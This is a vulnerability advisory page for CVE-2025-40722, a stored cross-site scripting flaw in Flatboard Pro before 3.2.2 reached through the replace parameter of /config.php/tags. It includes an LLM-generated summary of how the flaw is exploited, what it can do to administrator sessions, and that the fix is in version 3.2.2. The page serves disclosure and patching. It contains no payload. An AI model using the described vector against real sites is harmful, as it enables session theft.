CVE-2025-40722
Description
Stored Cross-Site Scripting (XSS) vulnerability in versions prior to Flatboard 3.2.2 of Flatboard Pro, consisting of a stored XSS due to lack of proper validation of user input, through the replace parameter in /config.php/tags.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Flatboard Pro versions prior to 3.2.2 contain a stored XSS vulnerability in the replace parameter of /config.php/tags, allowing attackers to inject arbitrary scripts.
Vulnerability
A stored cross-site scripting (XSS) vulnerability exists in Flatboard Pro versions prior to 3.2.2. The flaw is due to insufficient validation of user input supplied via the replace parameter in /config.php/tags. This allows an attacker to inject malicious scripts that are stored and later executed in the context of an administrator's browser.
Exploitation
Attackers must have low-privileged access to the application (e.g., authenticated as a registered user). By sending a crafted request to the vulnerable endpoint, the injected payload is stored. When an administrator views the tags configuration page, the script executes, potentially leading to session hijacking or further attacks.
Impact
Successful exploitation enables an attacker to execute arbitrary JavaScript in the context of the affected administrator session. This could result in theft of session cookies, defacement, or other malicious actions within the application's security context.
Mitigation
The vulnerability has been fixed in Flatboard version 3.2.2. Users are advised to update immediately. No workarounds are available [1].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <3.2.2
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
1News mentions
0No linked articles in our index yet.